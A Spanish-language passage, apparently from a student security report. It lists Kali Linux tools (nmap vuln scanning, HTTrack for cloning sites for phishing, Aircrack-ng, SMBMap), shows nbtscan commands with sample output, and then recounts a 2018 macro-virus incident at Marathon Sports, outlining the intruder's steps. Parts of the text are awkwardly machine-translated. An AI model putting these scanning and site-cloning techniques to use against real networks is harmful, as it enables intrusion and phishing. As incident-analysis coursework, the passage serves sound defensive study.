~$ nmap kali.org --script vuln

Para ver una lista completa de la sintaxis y los modificadores que la herramienta admite:

~$ nmap –help

- HTTRACK: Es un clonador de páginas web que nos permitirá copiar todo el código de
un sitio web. Desde la perspectiva de un test de penetración, se utiliza principalmente
para suplantar la identidad de un sitio real, y crear lo que se denomina un phising en
un servidor atacante. Para ejecutar la herramienta basta con teclear en nuestro
terminal $ httrack

Una vez lanzado, el asistente nos solicitará algunos datos como el nombre del proyecto,
su ruta base, el destino de la url y la configuración del proxy.
- Aircrack-ng: Es una de las mejores herramientas inalámbricas para hackear contraseñas
para el craqueo WEP/WAP/WPA2 utilizado en todo el mundo.
Funciona al tomar paquetes de la red, lo analiza a través de contraseñas recuperadas.
También posee una interfaz de consola. Además de esto, Aircrack-ng también utiliza el
ataque estándar de FMS (Fluhrer, Mantin y Shamir) junto con algunas optimizaciones
como los ataques KoreK y el ataque PTW para acelerar el ataque, que es más rápido que
el WEP.

- SMBMap: Es una herramienta que nos permitirá enumerar recursos compartidos samba
a lo largo de un dominio. Y no sólo eso, enumera contenidos y permisos, soporta pass-
the-hash, descarga/sube/borra ficheros, busca patrones de nombres de fichero con la
opción de auto descargarlos e incluso ejecuta comandos en remoto.

- NBTSCAN:

Busca en la red nodos que tengan el servicio NetBios activado y muestra información
de ellos (por ejemplo el Nombre, IP, MAC, etc). Es similar al programa ipscan pero en
modo consola.
 nbtscan nbtscan 192.168.1.0-6 busca en el rango establecido (de la .1 a la .6) nodos
con el protocolo NetBios activado.

# nbtscan 192.168.1.0-6

Doing NBT name scan for addresses from 192.168.1.0-6

IP address NetBIOS Name Server User MAC address

------------------------------------------------------------------------------

192.168.1.0 Sendto failed: Permission denied

192.168.1.4 PEPE <server> <unknown> 10:20:30:40:10:a2

nbtscan -v 192.168.1.0-6 ídem al anterior pero con la opción -v activa el modo de

información ampliada.

# nbtscan -v 192.168.1.0-6

Doing NBT name scan for addresses from 192.168.1.0-6

192.168.1.0 Sendto failed: Permission denied

NetBIOS Name Table for Host 192.168.1.4:

Incomplete packet, 173 bytes long.

Name Service Type

----------------------------------------

PEPE <00> UNIQUE

YGAW <00> GROUP

PEPE <20> UNIQUE

YGAW <1e> GROUP

Adapter address: 10:20:30:40:10:a2

---------------------------------------

9.5. Uso de Herramienta NBTSCAN:

 Ésta es una comando-línea herramienta que las exploraciones para los nameservers abiertos
de NETBIOS en una red local o alejada del TCP/IP, y ésta son un primer paso en encontrar de
partes abiertas. Se basa en la funcionalidad del nbtstat estándar de la herramienta de
Windows, pero funciona encendido una gama de direcciones en vez de apenas una.

- Instalación en KALI LINUX .- Ingresamos al Modo Root e intslamos.

1 sudo apt-get update
2 sudo apt-get install nbtscan

- Ejecutamos el Comando nbtscan : root@kali:~# nbtscan

- Ejecutamos el comando siguiente para verificar si existen en la Red algún enlace

compartido de archivos con otro PC:

root@kali:~# nbtscan –r 192.168.100.79/24

Listo, podemos Observar en la captura de pantalla que la IP 192.168.100.131

(INTRUSO) está conectada por acceso remoto o carpetas compartidas a la IP
192.168.100.79 (VICTIMA ), e incluso nos muestra el nombre único MAC para
detectar con mayor claridad donde está ubicada.

Exposición final de lo suscitado en la EMPRESA MARATHON SPORTS:

El miércoles 7 de Febrero del 2018 a las 17:30 el virus se alojó en el computador de Logística
donde se encontraba la información necesaria de los Embarques próximos Arribar al CD.

Consecuencias del Virus Macro:

El Virus Macro afecto a los archivos antes mencionados ocasionando en el CD lo siguiente:

Los Jefes del CD no tenían el Informe General para analizar el espacio de recepción en el CD y
autorizar la llegada de los Embarques.

El Área de Transferencias tuvo pérdida de tiempo en recursos, ya que el personal estaba

esperando dicha información para proceder con el descargue, separación de categorías, líneas,
colocación de precios/tickets, repartición del producto, transferencias a los Almacenes
(guardado - conteo) y carga a los Camiones para su respectivo envió.

El Área de descarga no tenía los informes para cuadrar los Embarques y reportar los faltantes y
sobrantes si existiesen.

El Área de logística buscaba alternativas para realizar nuevos informes en otras computadoras
que no se encuentren infectadas del virus macro.

Los encargados que realizan tareas en el Área de Logística estaban conformados por las
siguientes personas:

- Sr. Eddy: Logística e información de Embarques.

- Sr. Geovanny: Costeos de Embarques.

- Sr. Luis: Facturación de Embarques.

- Sr. Juan Carlos: Encargado de Área y revisión de procesos.

Revisando los procesos se identifica que el Sr. Eddy es la persona la encargada de la Logística e
información de los Embarques que llegan al CD, el cual nos comenta que su equipo cumplía con
las todas los normativas de seguridad y cualquier cambio en el sistema, actualización o
instalación de software se solicita autorización del Encargado de Área ya que él tenía Clave de
ADMINISTARADOR para realizar cualquier proceso, por tal motivo podemos asegurar que el
daño fue causado por un INTRUSO.

MODO OPERANDI DEL INTRUSO Y LA INSTALACION DEL VIRUS MACRO

PC1: COMPUTADOR DE LOGISTICA E INFORMACION DEL CD:

-El atacante Ingresa al PC1 con nombre de Usuario y Contraseña para establecer una conexión y
compartir las carpetas que van a ser infectadas.
-El atacante desactiva el ANTIVIRUS y el FIREWALL

PC2: COMPUTADOR DEL INTRUSO:

-El atacante en su PC2 ingresa a las Carpetas Compartidas y procede a copiar el VIRUS MACRO
INSTALACION DEL VIRUS POR PARTE DEL INTRUSO:

- Al realizar los pasos anteriores el atacante nuevamente ingresa al PC1 (Computador de

Logística e Información) para ejecutar el VIRUS MACRO y proceder con el daño planificado.

Archivo de LOGISTICA Archivos de INFORMACION

(Base de Datos) (Información de Embarques)